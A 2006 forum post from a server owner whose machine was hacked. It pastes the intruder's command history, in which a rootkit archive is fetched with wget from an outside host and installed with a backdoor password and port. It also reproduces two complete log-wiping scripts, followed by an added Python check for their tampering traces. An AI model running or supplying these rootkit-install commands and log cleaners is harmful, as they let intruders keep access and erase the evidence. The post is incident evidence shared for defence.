Crying, my server was hacked today. Could I ask everyone what can be done?

Posted on 2006-11-17 14:39:41
Here are the relevant records:
exit
pwd
ps -U root
ps -U root
id
wget test4.go.ro/sbh5.tar.tar
wget test4.go.ro/shv5.tar.tar
tar zxvf shv5.tar.tar
cd shv5
./setuop
./setup muiema 54323
cd ..
id
ls
./led
./led
id
cd shv5
./setup muiema 54323
id
./setup muiema 54323
ls -alp
chmod +x *
./setup muiema 54323

_____________________
hide
_________
#!/bin/bash

echo "                Linux Hider v2.0 by mave"
echo "                enhanced by me!         "
echo "[+] [Shkupi Logcleaner] Removing $1 from the logs........ ."
echo ""

if [ -f /var/log/maillog ]; then
   cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz
   touch -acmr /var/log/maillog /tmp/maillog.xz
   mv -f /tmp/maillog.xz /var/log/maillog
   echo "[+] /var/log/maillog   ... [done]"
   echo ""
fi

if [ -f /var/log/messages ]; then
   cat /var/log/messages | grep -v $1 > /tmp/messages.xz
   touch -acmr /var/log/messages /tmp/messages.xz
   mv -f /tmp/messages.xz /var/log/messages
   echo "[+] /var/log/messages  ... [done]"
   sleep 2
   echo ""
fi

if [ -f /var/log/secure ]; then
   cat /var/log/secure | grep -v $1 > /tmp/secure.xz
   touch -acmr /var/log/secure /tmp/secure.xz
   mv -f /tmp/secure.xz /var/log/secure
   echo "[+] /var/log/secure    ... [done]"
   echo ""
fi

if [ -f /var/log/xferlog ]; then
   cat /var/log/xferlog | grep -v $1 > /tmp/xferlog.xz
   touch -acmr /var/log/xferlog /tmp/xferlog.xz
   mv -f /tmp/xferlog.xz /var/log/xferlog
   sleep 2
   echo "[+] /var/log/xferlog   ... [done]"
   echo ""
fi

if [ -f /var/run/utmp ]; then
   cat /var/run/utmp | grep -v $1 > /tmp/utmp.xz
   touch -acmr /var/run/utmp /tmp/utmp.xz
   mv -f /tmp/utmp.xz /var/run/utmp
   echo "[+] /var/run/utmp      ... [done]"
   echo ""
fi

if [ -f /var/log/lastlog ]; then
   cat /var/log/lastlog |grep -v $1 > /tmp/lastlog.xz
   touch -acmr /var/log/lastlog /tmp/lastlog.xz
   mv -f /tmp/lastlog.xz /var/log/lastlog
   sleep 2
   echo "[+] /var/log/lastlog   ... [done]"
   echo ""
fi

if [ -f /var/log/wtmp ]; then
   cat /var/log/wtmp |grep -v $1 > /tmp/wtmp.xz
   touch -acmr /var/log/wtmp /tmp/wtmp.xz
   mv -f /tmp/wtmp.xz /var/log/wtmp
   echo "[+] /var/log/wtmp      ... [done]"
   echo ""
fi

rm -f /tmp/*.xz
echo "            * m i s s i o n  a c c o m p l i s h e d *"
echo ""
sleep 2
echo "                    p.h.e.e.r  S.H.c.r.e.w"
echo ""
sleep 5
exit 1

__________________
shsb
________
#!/bin/bash
#
# sauber - by socked [11.02.99]
#
# Usage: sauber <string>

BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''

echo "${BLK}* ${WHI}sauber ${DWHI}by ${WHI}s${BLU}o${DBLU}ck${BLK}ed [${DWHI}07${BLK}.${DWHI}27${BLK}.${DWHI}97${BLK}]${RES}"
if [ $# != 1 ]
then
  echo "${BLK}* ${DWHI}Usage${WHI}: "`basename $0`" <${DWHI}string${WHI}>${RES}"
  echo " "
  exit
fi
echo "${BLK}*${RES}"
echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}"

WERD=$(/bin/ls -F /var/log | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "@")

for fil in $WERD
do
   line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
   echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}...${RES}"
   grep -v $1 /var/log/$fil > new
   touch -r /var/log/$fil new
   mv -f new /var/log/$fil
   newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
   let linedel=$(($line-$newline))
   echo "${WHI}$linedel ${DWHI}lines removed!${RES}"

done

killall -HUP syslogd
echo "${BLK}* ${DWHI}Alles sauber mein Meister !'Q%&@$! ${RES}"


Can anyone help me log on to the server and check whether there are still any backdoors??
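
Both scripts in the post rewrite each log and then copy the old timestamps back with `touch -r`, and the first one also pipes the binary `utmp`, `wtmp` and `lastlog` files through `grep`. The following Python check for those two traces is an added example, not part of the original post; the function names are hypothetical, the record sizes (384 bytes for `utmp`/`wtmp`, 292 for `lastlog`) are assumptions for glibc on Linux, and the sample files are constructed.

```python
import os
import tempfile

# Assumed record sizes for glibc on Linux (struct utmp / struct lastlog).
RECORD_SIZES = {"utmp": 384, "wtmp": 384, "lastlog": 292}
CTIME_SLACK = 2.0  # seconds of tolerance between mtime and ctime


def check_log(path):
    """Return a list of tamper indicators for one log file."""
    findings = []
    st = os.stat(path)
    # `touch -r` can set mtime back, but the kernel stamps ctime with the
    # real time of the change, so ctime ends up later than mtime.
    if st.st_ctime - st.st_mtime > CTIME_SLACK:
        findings.append("ctime later than mtime (timestamp reset or file replaced)")
    # Filtering a binary accounting file as text breaks its fixed-size records.
    size = RECORD_SIZES.get(os.path.basename(path))
    if size and st.st_size % size:
        findings.append("size %d is not a multiple of %d-byte records" % (st.st_size, size))
    return findings


def scan(paths):
    """Map each existing path to its findings, keeping only flagged files."""
    checked = {p: check_log(p) for p in paths if os.path.isfile(p)}
    return {p: f for p, f in checked.items() if f}


def demo():
    """Constructed sample: one untouched log, one back-dated, one truncated wtmp."""
    d = tempfile.mkdtemp()
    samples = {"messages": b"line\n" * 10, "secure": b"line\n" * 10,
               "wtmp": b"\0" * (384 * 2 - 37)}
    for name, data in samples.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(data)
    old = os.stat(os.path.join(d, "secure")).st_mtime - 3600
    os.utime(os.path.join(d, "secure"), (old, old))  # same effect as touch -r
    return {os.path.basename(p): v
            for p, v in scan([os.path.join(d, n) for n in samples]).items()}


if __name__ == "__main__":
    for name, found in demo().items():
        print(name, found)
```

Files renamed by log rotation also show a ctime later than their mtime, so that finding is a lead to follow up on the active logs rather than proof by itself.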